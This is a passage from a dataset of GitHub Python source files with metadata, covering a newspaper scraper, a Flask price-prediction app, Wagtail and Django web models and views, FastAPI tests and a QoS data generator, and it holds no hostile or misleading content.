filename=text_filename)\n time.sleep(0.1)\n urllib.request.urlretrieve(alto_url,\n filename=alto_filename)\n if scrape_images:\n urllib.request.urlretrieve(image_url,\n filename=image_filename)\n break\n except http.client.HTTPException as e:\n print(e)\n print(str(attempt) + \"/10 Retrying in 2 seconds.\")\n time.sleep(2)\n continue\n break\n\n\ndef download_material_for_day(year, month, day, material_type, browser):\n\n day_dir = ('output/scrape_results/' +\n str(year) + '/' +\n convert_day_or_month_to_str(month) + '/' +\n convert_day_or_month_to_str(day) + '/')\n csv_filename = (day_dir +\n material_type + '-' +\n str(year) + '-' +\n convert_day_or_month_to_str(month) + '-' +\n convert_day_or_month_to_str(day) + '.csv')\n\n if not glob.glob(csv_filename):\n print(\" ---- no papers to scrape for: \" + day_dir)\n else:\n day_list = read_csv_to_dictlist(csv_filename, browser)\n write_refined_csv(day_dir, day_list, material_type)\n download_items_from_day_list(day_list, day_dir, material_type)\n", "repo_name": "villevaara/digi-scraper", "sub_path": "digi-sele/digi_selenium_scraper_daily_functions.py", "file_name": "digi_selenium_scraper_daily_functions.py", "file_ext": "py", "file_size_in_byte": 5293, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.reader", "line_number": 15, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "random.random", "line_number": 96, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 97, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 101, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 101, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 101, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 103, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 104, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 104, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 104, "usage_type": "name"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 107, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 107, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 107, "usage_type": "name"}, {"api_name": "http.client", "line_number": 110, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 113, "usage_type": "call"}, {"api_name": "digi_selenium_scraper_common_functions.convert_day_or_month_to_str", "line_number": 122, "usage_type": "call"}, {"api_name": "digi_selenium_scraper_common_functions.convert_day_or_month_to_str", "line_number": 123, "usage_type": "call"}, {"api_name": "digi_selenium_scraper_common_functions.convert_day_or_month_to_str", "line_number": 127, "usage_type": "call"}, {"api_name": "digi_selenium_scraper_common_functions.convert_day_or_month_to_str", "line_number": 128, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "13775152719", "text": "# flask.py\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import jsonify\nfrom flask import url_for\nimport numpy as np\nfrom numpy import loadtxt\nfrom keras.models import load_model\nimport pandas as pd\nfrom pandas import read_csv\nimport datetime\n\napp = Flask(__name__)\n\n# load model\nmodel = load_model('Queens_apartment.h5')\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/', methods=['POST']) # https://github.com/nitinkaushik01/Deploy_Machine_Learning_Model_on_Flask_App/blob/master/Flask_Sample_App/app.py\ndef predict():\n # grabs the input data when a post request is sent\n ResU= int(request.form['Residential_Units'])\n ComU= int(request.form['Commercial_Units'])\n Gsqft= float(request.form['Gross_sqft'])\n Zip= str(request.form['Zip_Code'])\n Class_C= str(request.form['Class_Category'])\n Year= (request.form['Year_Built'])\n\n #convert year to the str category that the model will understand\n Year = int(Year)\n if Year < 3:\n Year ='AGE OF BUILDING_1'\n elif Year < 10:\n Year = 'AGE OF BUILDING_2'\n elif Year < 20:\n Year = 'AGE OF BUILDING_3'\n elif Year < 30:\n Year = 'AGE OF BUILDING_4'\n elif Year < 50:\n Year = 'AGE OF BUILDING_5'\n elif Year < 75:\n Year = 'AGE OF BUILDING_6'\n elif Year < 100:\n Year = 'AGE OF BUILDING_7'\n elif Year < 150:\n Year = 'AGE OF BUILDING_8'\n else:\n Year = 'AGE OF BUILDING_9'\n\n df = pd.read_csv(r'cleaned_data.csv')\n\n # divides the data set into X (data) and Y (desired predicted value)\n X = df.drop(columns=['SALE PRICE'])\n Y = df['SALE PRICE']\n\n def predict_price(Residential_Units, Commercial_Units, Gross_sqft, Zip_Code, Class_Category, Year_Built):\n Zip_Code_index= np.where(X.columns==Zip_Code)[0][0] # finds column with the title given in the neighborhood box\n Class_Category_index= np.where(X.columns==Class_Category)[0][0]\n year_index= np.where(X.columns==Year_Built)[0][0]\n\n x=np.zeros(len(X.columns)) #sets all columns in a data set object x to zero\n x[0]= Residential_Units #changes a specified column from zero to the value assigned to the variable (retreived from the post request)\n x[1]= Commercial_Units\n x[2]= Gross_sqft\n if Zip_Code_index >= 0:\n x[Zip_Code_index] = 1 # assigns a one to the desired neighborhood (one hot encoding)\n if Class_Category_index >= 0:\n x[Class_Category_index] = 1\n if year_index >= 0:\n x[year_index] = 1\n\n #return model.predict([x])[0]\n test1 = np.array([x])[0] #the x data set object is passed through the ml model\n return model.predict(test1.reshape(1, 88), batch_size=1)\n\n prediction = predict_price(ResU,ComU,Gsqft,Zip,Class_C,Year) # set up this way to avoid confusion between global and local variables\n return render_template('index.html', prediction_text='Price should be {}'.format(prediction)) # prediction sent to index.html template file\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n", "repo_name": "Ncalo19/Queens_price_predictor", "sub_path": "Queens_apartment_flask.py", "file_name": "Queens_apartment_flask.py", "file_ext": "py", "file_size_in_byte": 3120, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "19071803062", "text": "from django.db import models\n\nfrom modelcluster.fields import ParentalKey\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom taggit.models import TaggedItemBase\n\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.admin.edit_handlers import FieldPanel, MultiFieldPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.documents.models import Document\nfrom wagtail.documents.edit_handlers import DocumentChooserPanel\nfrom wagtail.search import index\n\n\nclass ReportIndexPage(Page):\n intro = RichTextField(blank=True)\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n reportpages = self.get_children().live().order_by('-first_published_at')\n context['reportpages'] = reportpages\n return context\n\nclass ReportPageTag(TaggedItemBase):\n content_object = ParentalKey(\n 'ReportPage',\n related_name='tagged_items',\n on_delete=models.CASCADE\n )\n\nclass ReportPage(Page):\n date = models.DateField(\"Post date\")\n report_document = models.ForeignKey(\n 'wagtaildocs.Document',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n indicator_number = models.CharField(max_length=250)\n indicator_caption = models.CharField(max_length=250)\n body = RichTextField(blank=True)\n tags = ClusterTaggableManager(through=ReportPageTag, blank=True)\n\n search_fields = Page.search_fields + [\n index.SearchField('indicator_caption'),\n index.SearchField('body'),\n ]\n\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n FieldPanel('date'),\n FieldPanel('tags'),\n ], heading=\"Report Metadata\"),\n DocumentChooserPanel('report_document'),\n FieldPanel('indicator_number'),\n FieldPanel('indicator_caption'),\n FieldPanel('body'),\n ]\n\nclass ReportTagIndexPage(Page):\n\n def get_context(self, request):\n\n # Filter by tag\n tag = request.GET.get('tag')\n reportpages = ReportPage.objects.filter(tags__name=tag)\n\n # Update template context\n context = super().get_context(request)\n context['reportpages'] = reportpages\n return context\n", "repo_name": "NiJeLorg/UNITEPinellas", "sub_path": "website/reports/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "wagtail.core.models.Page", "line_number": 16, "usage_type": "name"}, {"api_name": "wagtail.core.fields.RichTextField", "line_number": 17, "usage_type": "call"}, {"api_name": "taggit.models.TaggedItemBase", "line_number": 26, "usage_type": "name"}, {"api_name": "modelcluster.fields.ParentalKey", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models.CASCADE", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "wagtail.core.fields.RichTextField", "line_number": 44, "usage_type": "call"}, {"api_name": "modelcluster.contrib.taggit.ClusterTaggableManager", "line_number": 45, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page.search_fields", "line_number": 47, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 47, "usage_type": "name"}, {"api_name": "wagtail.search.index.SearchField", "line_number": 48, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 48, "usage_type": "name"}, {"api_name": "wagtail.search.index.SearchField", "line_number": 49, "usage_type": "call"}, {"api_name": "wagtail.search.index", "line_number": 49, "usage_type": "name"}, {"api_name": "wagtail.core.models.Page.content_panels", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wagtail.core.models.Page", "line_number": 52, "usage_type": "name"}, {"api_name": "wagtail.admin.edit_handlers.MultiFieldPanel", "line_number": 53, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 54, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 55, "usage_type": "call"}, {"api_name": "wagtail.documents.edit_handlers.DocumentChooserPanel", "line_number": 57, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 58, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 59, "usage_type": "call"}, {"api_name": "wagtail.admin.edit_handlers.FieldPanel", "line_number": 60, "usage_type": "call"}, {"api_name": "wagtail.core.models.Page", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "18808548908", "text": "\"\"\"\nModule for test API endpoints\n\"\"\"\n\nfrom fastapi.testclient import TestClient\n\nfrom application.app import app, health_message, root_endpoint_message\n\nclient = TestClient(app)\n\n\nclass TestFastAPIApp:\n \"\"\"\n Class define tests for testing FastAPI application\n \"\"\"\n\n def read_main_test(self):\n \"\"\"Tests access to the root endpoint\"\"\"\n response = client.get(\"/\")\n assert response.status_code == 200\n assert response.json() == root_endpoint_message\n\n def read_health_test(self):\n \"\"\"Tests access to the healtcheck endpoint\"\"\"\n response = client.get(\"health\")\n assert response.status_code == 200\n assert response.json() == health_message\n", "repo_name": "maciuozz/test-app-argocd-src", "sub_path": "src/tests/app_test.py", "file_name": "app_test.py", "file_ext": "py", "file_size_in_byte": 706, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.testclient.TestClient", "line_number": 9, "usage_type": "call"}, {"api_name": "application.app.app", "line_number": 9, "usage_type": "argument"}, {"api_name": "application.app.root_endpoint_message", "line_number": 21, "usage_type": "name"}, {"api_name": "application.app.health_message", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "29183908496", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom utils.contrib import build_json\nfrom utils.contrib import order_state\nfrom partner.models import Orders\nfrom partner.models import Partner\nfrom partner.models import Product\nfrom userextends.models import UserExtends\nfrom weixin import wxapi\nfrom utils import contrib\nimport datetime\nimport time\nimport json\nimport uuid\n\n# Create your views here.\ndef cancel_order(request):\n if oprate_order(request, u'已撤销'):\n return HttpResponse(build_json(None));\n return HttpResponse(build_json(None, 1, '当前状态不允许再改变'));\n\ndef accept_order(request):\n if oprate_order(request, u'已确认'):\n return HttpResponse(build_json(None));\n return HttpResponse(build_json(None, 1, '当前状态不允许再改变'));\n\ndef dismiss_order(request):\n if oprate_order(request, u'已拒绝'):\n return HttpResponse(build_json(None));\n return HttpResponse(build_json(None, 1, '当前状态不允许再改变'));\n\ndef oprate_order(request, oprate):\n states = order_state()\n if 'id' in request.POST:\n order = Orders.objects.get(id=request.POST['id'])\n if order.change_state(oprate) is True:\n userextends = UserExtends.objects.get(user=order.user)\n access_token = wxapi.wx_access_token()\n wxapi.send_wxmsg(\n access_token,\n userextends.openid, order, u\"你的订单状态有变化!\", u\"祝用餐愉快!\", \"http://sc.kangyanping.com/wx/order?id=\" + str(order.id))\n return True\n return False\n\ndef create_order(request):\n now = datetime.datetime.now()\n if not request.user.is_authenticated:\n return HttpResponse(build_json(None, 1, 'not login'));\n\n userextends = UserExtends.objects.get(user=request.user)\n if not userextends:\n return HttpResponse(build_json(None, 1, 'not login'));\n\n data = json.loads(request.body)\n note = ''\n booktime = ''\n bookdate = now.strftime('%Y-%m-%d ')\n menu_products = []\n pid = ''\n needroom = ''\n vcode = ''\n phone = ''\n if 'note' in data:\n note = data['note']\n if 'booktime' in data:\n booktime = data['booktime']\n if 'ids' in data:\n menu_products = data['ids']\n if 'pid' in data:\n pid = data['pid']\n if 'needroom' in data:\n needroom = data['needroom']\n if 'vcode' in data:\n vcode = data['vcode']\n if 'phone' in data:\n phone = data['phone']\n if 'bookdate' in data:\n bookdate = data['bookdate']\n\n #如果没有手机号需要校验验证码\n if not userextends.phone:\n if not contrib.verify_code(phone, vcode):\n return HttpResponse(build_json(None, 1, '验证码错误'))\n userextends.phone = phone\n #如果手机号有变化需要校验验证码\n if userextends.phone != phone:\n if not contrib.verify_code(phone, vcode):\n return HttpResponse(build_json(None, 1, '验证码错误'))\n userextends.phone = phone\n\n product_ids = []\n for p in menu_products:\n product_ids.append(p['id'])\n\n products = Product.objects.filter(id__in = product_ids).filter(partner_id=pid)\n price = 0.0\n count = 0\n for product in products:\n for p in menu_products:\n if p['id'] == product.id:\n price += p['num'] * p['price']\n count += p['num']\n\n partner = Partner.objects.get(id=pid)\n order = Orders()\n order.user = request.user\n order.partner = partner\n order.set_products(menu_products)\n order.price = price\n order.create_on = now.strftime('%Y-%m-%d %H:%M:%S')\n order.create_by = request.user.username\n order.modify_on = now.strftime('%Y-%m-%d %H:%M:%S')\n order.modify_by = request.user.username\n order.effected_on = bookdate + \" \" + booktime + now.strftime(':%S')\n effected_on = time.mktime(time.strptime(order.effected_on, \"%Y-%m-%d %H:%M:%S\"))\n if effected_on - time.time() < (30 * 60):\n return HttpResponse(build_json(None, 2, '必须提前30分钟预定'))\n order.guid = uuid.uuid1()\n order.set_needroom(needroom)\n order.set_note(note)\n order.save()\n\n userextends.set_collect(partner.id)\n userextends.save()\n\n userextends = UserExtends.objects.get(user=partner.username)\n access_token = wxapi.wx_access_token()\n wxapi.send_wxmsg(\n access_token,\n userextends.openid, order, u\"你收到了新的订单!\", u\"请及时处理!\", \"http://sc.kangyanping.com/wx/partner/order?id=\"+str(order.id))\n return HttpResponse(build_json({ 'id': order.id}))\n", "repo_name": "fishingmaner/testmycode", "sub_path": "partner/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.http.HttpResponse", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 23, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 24, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 28, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 29, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 29, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 33, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.contrib.order_state", "line_number": 37, "usage_type": "call"}, {"api_name": "partner.models.Orders.objects.get", "line_number": 39, "usage_type": "call"}, {"api_name": "partner.models.Orders.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "partner.models.Orders", "line_number": 39, "usage_type": "name"}, {"api_name": "userextends.models", "line_number": 41, "usage_type": "name"}, {"api_name": "userextends.models.UserExtends.objects.get", "line_number": 41, "usage_type": "call"}, {"api_name": "userextends.models.UserExtends.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "userextends.models.UserExtends", "line_number": 41, "usage_type": "name"}, {"api_name": "weixin.wxapi.wx_access_token", "line_number": 42, "usage_type": "call"}, {"api_name": "weixin.wxapi", "line_number": 42, "usage_type": "name"}, {"api_name": "weixin.wxapi.send_wxmsg", "line_number": 43, "usage_type": "call"}, {"api_name": "weixin.wxapi", "line_number": 43, "usage_type": "name"}, {"api_name": "userextends.models.openid", "line_number": 45, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 45, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.http.HttpResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 52, "usage_type": "call"}, {"api_name": "userextends.models", "line_number": 54, "usage_type": "name"}, {"api_name": "userextends.models.UserExtends.objects.get", "line_number": 54, "usage_type": "call"}, {"api_name": "userextends.models.UserExtends.objects", "line_number": 54, "usage_type": "attribute"}, {"api_name": "userextends.models.UserExtends", "line_number": 54, "usage_type": "name"}, {"api_name": "userextends.models", "line_number": 55, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 56, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 58, "usage_type": "call"}, {"api_name": "userextends.models.phone", "line_number": 85, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 85, "usage_type": "name"}, {"api_name": "utils.contrib.verify_code", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.contrib", "line_number": 86, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 87, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 87, "usage_type": "call"}, {"api_name": "userextends.models.phone", "line_number": 88, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 88, "usage_type": "name"}, {"api_name": "userextends.models.phone", "line_number": 90, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 90, "usage_type": "name"}, {"api_name": "utils.contrib.verify_code", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.contrib", "line_number": 91, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 92, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 92, "usage_type": "call"}, {"api_name": "userextends.models.phone", "line_number": 93, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 93, "usage_type": "name"}, {"api_name": "partner.models.Product.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "partner.models.Product.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "partner.models.Product", "line_number": 99, "usage_type": "name"}, {"api_name": "partner.models", "line_number": 108, "usage_type": "name"}, {"api_name": "partner.models.Partner.objects.get", "line_number": 108, "usage_type": "call"}, {"api_name": "partner.models.Partner.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "partner.models.Partner", "line_number": 108, "usage_type": "name"}, {"api_name": "partner.models.Orders", "line_number": 109, "usage_type": "call"}, {"api_name": "partner.models", "line_number": 111, "usage_type": "name"}, {"api_name": "time.mktime", "line_number": 119, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 119, "usage_type": "call"}, {"api_name": "time.time", "line_number": 120, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 121, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 121, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 122, "usage_type": "call"}, {"api_name": "userextends.models.set_collect", "line_number": 127, "usage_type": "call"}, {"api_name": "userextends.models", "line_number": 127, "usage_type": "name"}, {"api_name": "partner.models.id", "line_number": 127, "usage_type": "attribute"}, {"api_name": "partner.models", "line_number": 127, "usage_type": "name"}, {"api_name": "userextends.models.save", "line_number": 128, "usage_type": "call"}, {"api_name": "userextends.models", "line_number": 128, "usage_type": "name"}, {"api_name": "userextends.models", "line_number": 130, "usage_type": "name"}, {"api_name": "userextends.models.UserExtends.objects.get", "line_number": 130, "usage_type": "call"}, {"api_name": "userextends.models.UserExtends.objects", "line_number": 130, "usage_type": "attribute"}, {"api_name": "userextends.models.UserExtends", "line_number": 130, "usage_type": "name"}, {"api_name": "partner.models.username", "line_number": 130, "usage_type": "attribute"}, {"api_name": "partner.models", "line_number": 130, "usage_type": "name"}, {"api_name": "weixin.wxapi.wx_access_token", "line_number": 131, "usage_type": "call"}, {"api_name": "weixin.wxapi", "line_number": 131, "usage_type": "name"}, {"api_name": "weixin.wxapi.send_wxmsg", "line_number": 132, "usage_type": "call"}, {"api_name": "weixin.wxapi", "line_number": 132, "usage_type": "name"}, {"api_name": "userextends.models.openid", "line_number": 134, "usage_type": "attribute"}, {"api_name": "userextends.models", "line_number": 134, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 135, "usage_type": "call"}, {"api_name": "utils.contrib.build_json", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "42808516391", "text": "import numpy as np\nimport os\nimport argparse\n\nassert os.getcwd().endswith('source_code'), '请将工作路径设为source_code,否则无法将结果存入正确路径'\n\nfrom env_configs.roadmap_env.roadmap_utils import Roadmap\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dyna_level', type=str, default='')\nargs = parser.parse_args()\n\ndef gen(POI_NUM, T):\n '''目前episode_steps硬编码为120,poi数量硬编码为NCSU'''\n # 分为三部分,一部分逐渐400 -> 200且权重增加,一部分逐渐200 -> 400且权重降低,另一部分固定300不变,权重不变\n # 预期结果:无人机前期重点关注第二类,后期重点关注第一类\n # if args.dyna_level == '1':\n # case1 = np.linspace(400, 200, T)\n # case2 = np.linspace(200, 400, T)\n # case3 = np.ones((T,)) * 300\n # elif args.dyna_level == '2':\n # case1 = np.linspace(300, 100, T)\n # case2 = np.linspace(100, 300, T)\n # case3 = np.ones((T,)) * 200\n # elif args.dyna_level == '3':\n # case1 = np.linspace(200, 100, T)\n # case2 = np.linspace(100, 200, T)\n # case3 = np.ones((T,)) * 150\n # elif args.dyna_level == '4':\n # case1 = np.linspace(300, 100, T)\n # case2 = np.linspace(100, 300, T)\n # case3 = np.ones((T,)) * 100\n raise NotImplementedError\n\n poi_QoS = np.vstack(\n [np.tile(case1, (10, 1)), np.tile(case2, (10, 1)), np.tile(case3, (13, 1))]\n ) # shape = (POI_NUM, T)\n assert poi_QoS.shape == (POI_NUM, T)\n return poi_QoS\n\n\ndef gen_according_to_cluster(POI_NUM, T):\n rm = Roadmap(dataset='NCSU', poi_num=POI_NUM)\n poi_mat = rm.init_pois(max_episode_step=T)\n\n # 根据user的初始位置划分case,具体划分规则参见草稿纸\n init_poses = poi_mat[:,0,:]\n case1 = np.linspace(300, 100, T)\n case2 = np.linspace(100, 300, T)\n case3 = np.ones((T,)) * 100\n poi_QoS = []\n count1, count2, count3 = 0, 0, 0\n for id, pos in enumerate(init_poses):\n if pos[0] < rm.max_dis_x/2:\n poi_QoS.append(case1)\n count1 += 1\n elif pos[1] < rm.max_dis_y/2:\n poi_QoS.append(case2)\n count2 += 1\n else:\n poi_QoS.append(case3)\n count3 += 1\n print(count1, count2, count3)\n poi_QoS = np.vstack(poi_QoS)\n assert poi_QoS.shape == (POI_NUM, T)\n return poi_QoS\n\n\ndef gen_spatial_temporal_SNRth(POI_NUM, T):\n # 右下角(case1)从100涨到500,其他地方(case2)从500降到100\n # 预期结果:任务前半部分主要去外面采,任务后半部分主要在右下角采\n case1 = np.linspace(500, 100, T)\n case2 = np.linspace(100, 500, T)\n\n rm = Roadmap(dataset='NCSU', poi_num=POI_NUM)\n poi_mat = rm.init_pois(max_episode_step=T) # shape = (33, 121, 2)\n assert poi_mat.shape == (POI_NUM, T+1, 2)\n\n poi_QoS = np.zeros((POI_NUM, T))\n count1, count2 = 0, 0\n for poi_id in range(POI_NUM):\n for t in range(T):\n pos = poi_mat[poi_id][t]\n if rm.max_dis_x / 2 < pos[0] < rm.max_dis_x and rm.max_dis_y / 2 < pos[1] < rm.max_dis_y:\n count1 += 1\n poi_QoS[poi_id][t] = case1[t]\n else:\n count2 += 1\n poi_QoS[poi_id][t] = case2[t]\n\n print(count1, count2)\n return poi_QoS\n\nPOI_NUM = 33\nT = 120\n# 将结果存入外存\nsave_dir = f'envs/NCSU/QoS{T}/poi_QoS{args.dyna_level}.npy'\n\nif args.dyna_level in (1, 2, 3, 4):\n result = gen(POI_NUM, T)\nelif args.dyna_level == 'cluster':\n result = gen_according_to_cluster(POI_NUM, T)\nelif args.dyna_level == 'SSTSS': # Same Space Time Same SNRth\n result = gen_spatial_temporal_SNRth(POI_NUM, T)\nelse:\n raise NotImplementedError\nnp.save(save_dir, result)\n#\n# ans = np.load(save_dir)\n# print(ans.shape)\n# print(ans.mean())\n# print(ans.var())\n", "repo_name": "Insomnia-y/DRL_dyna_AoI", "sub_path": "source_code/tools/pre/gen_poi_QoS.py", "file_name": "gen_poi_QoS.py", "file_ext": "py", "file_size_in_byte": 3852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.getcwd", "line_number": 5, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 36, "usage_type": "call"}, {"api_name": "env_configs.roadmap_env.roadmap_utils.Roadmap", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 73, "usage_type": "call"}, {"api_name": "env_configs.roadmap_env.roadmap_utils.Roadmap", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "40484824393", "text": "#This script connects hits in the data to produce tracks\n#Tracking Module of the ANNDEA package\n#Made by Filips Fedotovs\n\n######################################## Import libraries #############################################\nimport csv\nimport ast\ncsv_reader=open('../config',\"r\")\nconfig = list(csv.reader(csv_reader))\nfor c in config:\n if c[0]=='AFS_DIR':\n AFS_DIR=c[1]\n if c[0]=='EOS_DIR':\n EOS_DIR=c[1]\n if c[0]=='PY_DIR':\n 